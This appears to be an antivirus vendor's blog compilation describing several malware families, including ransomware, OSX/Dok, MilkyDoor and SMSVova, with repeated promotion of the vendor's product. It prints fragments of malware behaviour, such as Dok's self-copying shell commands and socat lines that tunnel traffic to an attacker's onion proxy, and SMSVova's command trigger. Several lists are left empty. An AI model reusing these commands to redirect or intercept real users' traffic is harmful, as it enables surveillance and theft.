Mikoyan ransomware

The infection process of .MIKOYAN ransomware is very similar to other ransomware infections out there. The malware may take advantage of massive spam campaigns that redistribute malicious attachments as well web links that lead to the download of the infection files. Such e-mails are cleverly orchestrated in a manner that aims to convince users to open the attachment.

Besides via e-mail, the .MIKOYAN ransomware virus may also be replicated via multiple other methods such as:

Exploit kits.
Via a previous infection with a botnet or a Trojan.
Through fake installers, flash player updates or other setup wizards.
Via a fake key generators or license activators uploaded on torrent websites.

Once this ransomware infection has already become active on a computer, the .MIKOYAN virus drops it’s malicious payload files. They are often located in the following Windows directories:

Besides the main executable of the MIKOYAN ransomware, named MIKOYAN.exe, the virus may also drop other malicious files that exist under different names, often randomly generated ones. After the encryption process has completed, the ransomware sets a .MIKOYAN file extension to the files encrypted by it.

To run on startup, the MIKOYAN ransomware may also modify the Windows Registry editor, more specifically the Run and RunOnce registry keys:

Like always we recommend that you keep an updated copy of Max Total Security on your PC which can restore your files from the daily built in back up. Also, 24×7 free support can help you with any issues. You can get it from here Max Total Security.

XPan Ransomware

The XPan Ransomware is being used to target small and medium businesses located in Brazil (although there is nothing limiting these attacks only to Brazil since these threat attacks can target computers anywhere). Taking advantage of remote desktop connections protected poorly is carrying out the XPan Ransomware attacks. Exploiting poor password protection and security measures, con artists can install the XPan Ransomware on the victims’ computers, as well as carry out other threatening operations.

The ransomware, suspected to be distributed by a group of small-time cybercriminals has already affected many computers belonging to small and medium businesses in the country. The similarities between XPan and .one ransomware was found during an in-depth analysis of the malicious program. The similarities include the target file extensions, ransom note, commands executed before and after the encryption process and even the public RSA keys of the criminals.

For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. According to one of the victims, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.

OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app …gives all users execute permission
rm -fr “/Users/_%USER%_/Downloads/Dokument.app”…delete the original copy
“/Users/Shared/Appstore.app/Contents/MacOS/AppStore”Dokument…exceute the application

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:



These LaunchAgents will redirect requests to through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind= SOCKS4A:,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

Beware of emails attachments, do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

MilkyDoor Android Malware

A newly discovered Android malware called MilkyDoor turns mobile devices into “walking backdoors” that give attackers access to whatever network an infected user is connected to. Affected phones essentially act as proxy servers that link legitimate networks with malicious command-and-control servers via Socket Secure (SOCKS) protocol, allowing bad actors to exfiltrate data.

It uses remote port forwarding via Secure Shell (SSH) tunnels to hide malicious traffic and grant attackers access to firewall-protected networks. The malware was recently found in over 200 Android applications available through the Play Store. Google has removed them from their official app store.

In total, researchers estimate the apps had between 500,000 and 1 million installs only through the Play Store alone.
While MilkyDoor appears to be DressCode’s successor, MilkyDoor adds a few malicious tricks of its own. Among them are its more clandestine routines that enable it to bypass security restrictions and conceal its malicious activities within normal network traffic. It does so by using remote port forwarding via Secure Shell (SSH) tunnel through the commonly used Port 22. The abuse of SSH helps the malware encrypt malicious traffic and payloads, which makes detection of the malware trickier.

We found these Trojanized apps masquerading as recreational applications ranging from style guides and books for children to Doodle applications. We surmise that these are legitimate apps which cybercriminals repackaged and Trojanized then republished in Google Play, banking on their popularity to draw victims.

MilkyDoor poses greater risk to businesses due to how it’s coded to attack an enterprise’s internal networks, private servers, and ultimately, corporate assets and data. The way MilkyDoor builds an SSH tunnel presents security challenges for an organization’s network, particularly in networks that integrate BYOD devices. Its stealth lies in how the infected apps themselves don’t have sensitive permissions and consequently exist within the device using regular or seemingly benign communication behavior.

The repercussions are also significant. MilkyDoor can covertly grant attackers direct access to a variety of an enterprise’s services—from web and FTP to SMTP in the internal network. The access can then be leveraged to poll internal IP addresses in order to scan for available—and vulnerable—servers. The recent spate of compromises in MongoDB and ElasticSearch databases, where their owners were also extorted, are a case in point. The servers were public, which is exacerbated by the lack of authentication mechanisms in its internal databases.

End users and enterprises can benefit from mobile total security solution, Max Total Security available on Google Play.

SMSVova Spyware -Android

SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time, was downloaded between 1 and 5 million times before being pulled from Google’s official U.S. Play Store. On the Play Store, the app was titled “System Update,” suggesting that users who download it would receive the latest Android release.

The malware, called SMSVova, is capable of pinpointing a user’s exact geolocation and then sending that data to an attacker. However, upon installing and opening SMSVova, the app immediately quits, delivering the following message: “Unfortunately, Update Service has stopped.” The app then hides itself from the main screen.

At this point, the app enables a MyLocationService feature that tracks a user’s last known location. It also scans for SMS message commands, which the attacker sends in order to adjust malware settings and ultimately request a user’s device location. The attacker can even specifically ask to receive a location alert when the victim’s battery is running low.


Despite the error message, the spyware sets up an Android service and broadcast receiver:

MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS messages

MyLocationService is to fetch the user’s last known location and set it up in Shared Preferences. Shared Preferences is one of the many ways Android stores an application’s data.
IncomingSMS is designed to look for incoming SMS messages with a particular syntax, in which the message should be more than 23 characters and should contain “vova-” in the SMS body. It also scans for a message containing “get faq.”

matrix9643@yahoo.com ransomware

Matrix virus, alternatively called as matrix9643@yahoo.com ransomware, functions as a crypto-Trojan. Matrix Ransomware has the worm like features that allow it to spread outside of the originally infected machine via Windows shortcuts. This malware appends “.matrix” or “.b10cked” extension to the name of every encrypted file. For instance, “sample.jpg” is renamed to “sample.jpg.matrix”. Following successful encryption, Matrix creates a text file “matrix-readme.rtf” (newer variants drop “Readme-Matrix.rtf” fileor “WhatHappenedWithMyFiles.rtf”) and places it in every folder containing ransom demanding message.


while performing the encryption, Matrix will hide a folder and then create a shortcut with the same name. It will then make a copy of the ransomware executable and save it as desktop.ini in the original:

Clicking on any shortcut will launch the malware program.

Files associated with the Matrix Ransomware:
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].hta

Network Communication:

With increase in everyday Ransomware activity, users are highly recommended to back up the files on daily basis to minimize loss of data and use a good anti virus program such Max Total Security which can take daily backup with highly configuration options for users.

Rijndael Ransomware-another encryptor

The Rijndael Ransomware may be contained in files named ‘BitcoinMiner.exe’ and ‘r4ns0mw4r3.exe’ and seems to be the work of a coder that goes by the online handle ‘humanpuff69.’ This coder has uploaded YouTube videos with information on how to create rogue security software and clones of CryptoWall. Like most ransomware Trojans, the Rijndael Ransomware is designed to block all access to the victim’s files by encrypting them using a strong encryption algorithm. The files affected by the Rijndael Ransomware will have the file extension ‘.fucked’ added to the extremity of each file’s name. The Rijndael Ransomware is capable of encrypting a wide variety of files.
To display its ransom note, the Rijndael Ransomware uses a program window that includes the message below:

‘Deathnote Hackers Was Here !
Your Computer files is encrypted
all files is encrypted with extremely
powerfull new RIDNDAEL encryption
that no one can break except you have
a private string and IVs
To Decrypt Your File You Should Pay Me
0.5 BTC (864.98 USD)
Contact Me : Riptours01@gmail.com
insert your code here:
[TEXT BOX] Decrypt!

Although it may be impossible to recover the data that is encrypted by Trojans like the Rijndael Ransomware, the Rijndael Ransomware’s decryption key is hard coded into its main executable file and have been able to recover it. Victims can enter the code ’83KYG9NW-3K39V-2T3HJ-93F3Q-GT’ into the text box included in the Rijndael Ransomware ransom message to restore their files. It is likely that the con artists will update the Rijndael Ransomware to remove this weakness, but for now, it is possible for computer users to recover their files from the attack.
Users can recover their encrypted file from Max Total Security Backup module.

Ramnit Trojan in new malvertising campaign

There has been an increase in malvertising activity coming from adult websites that have significant traffic (several million monthly visits each). Malicious actors are using pop-under ads (adverts that load in a new browser window under the current active page) to surreptitiously redirect users to the RIG exploit kit. It has mostly hit Canada and UK.

Ramnit spies on you and everything it finds it sends to the crooks behind it. We are talking IPs, usernames, passwords, accounts, email addresses, browser-related data, etc. Consider your private life no longer private. And last, but definitely not least, the Trojan may try stealing your money by making you purchase some fake anti-virus product or present you a fake update. Trust nothing. It is all a scam for profit. Don’t click on and definitely don’t by anything Ramnit suggests as you will only worsen your already pretty bad situation.

To manually find its infection ,do the following:
1. Run the Task Manager by right clicking on the Taskbar and choosing Start Task Manager.Run the Task Manager by right clicking on the Taskbar and choosing Start Task Manager. Look carefully at the file names and descriptions of the running processes. If you find any suspicious one, search on Google for its name. If you find a malware process, right-click on it and choose End task.

2.Open Control Panel by holding the Win Key and R together. Write appwiz.cpl in the field, then click OK. Here, find any program you had no intention to install and uninstall it.

3.Open MS Config by holding the Win Key and R together. Type msconfig and hit Enter. Go in the Startup tab and Uncheck entries that have “Unknown” as Manufacturer.

4. Scan with Max Total Security . If you still think your PC may be infected, contact Max Secure Software free 24×7 technical support.

AngryKite ransomware

Once infiltrated, AngryKite encrypts various data and renames compromised files using the “[random_characters].NumberDot” pattern. For example, “sample.jpg” might be renamed to “G4ag0-3tga.NumberDont”. Following successful encryption, AngryKite opens a pop-up window containing a fake error message.

The message states that a malware infection has been detected and that files are encrypted. To remove the malware, victims are encouraged to call a toll-free phone number (“1-855-545-6800″) provided. Victims are then supposedly guided through the malware removal process. In fact, this is a scam.

Text presented within AngryKite pop-up:

WARNING: SYSTEM MAY HAVE FOUND anonymous encryption on your computer. You would not be able to access the files on your computer. Your System May have Found (2) Malicious Viruses Rootkit.Encrypt & Trojan.Spyware Your Personal & Financial information MAY NOT BE SAFE Your system has encryption ransomware which may permanently encrypt your data Please call immediately to avoid further damage Toll free 1-855-545-6800.

Right now no methods are available to get rid of this malware other than restoring yur files from backup. It is recommended to keep an updated copy of Max Total Security which takes daily back up of files on your PC.

Chrysaor Malware on Android

Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS. Chrysaor is a highly sophisticated malware most likely used to carry out advanced espionage campaigns.

Chrysaor doesn’t exploit a vulnerability. Instead, Google believes attackers coax specifically targeted individuals to download the Chrysaor malware onto their device. “Once Chrysaor is installed, a remote operator is able to surveil the victim’s activities on the device and within the vicinity, leveraging microphone, camera, data collection, and logging and tracking application activities on communication apps such as phone and SMS,” wrote Google.

Upon installation, the app uses Framaroot rooting techniques to find security holes that allow the attackers to escalate privileges and break Android’s application sandbox, Google said. “If the targeted device is not vulnerable to these exploits, then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges,” according to Google.

Chrysaor is also very careful when it comes to being detected and is programmed to uninstall itself if there’s any chance it has been found, it will remove itself from the phone if the SIM MCC ID is invald, an ‘antidote’ file exists, it has not been able to check in with the servers after 60 days, or it receives a command from the server to remove itself.
Chrysaor had a very low volume of installs outside of Google Play, fewer than 3 dozen installs of Chrysaor on victim devices. These devices were located in the following countries:

To ensure you are fully protected against Potentially Harmful Applications (PHAs) and other threats, we recommend these 5 basic steps:

1. Install apps only from reputable sources: Install apps from a reputable source, such as Google Play.
2. Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.
3. Update your device: Keep your device up-to-date with the latest security patches.
4. Locate your device: Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA.
5. Keep a good Anti Virus or Android Total Security software installed on your device like Max Total Security .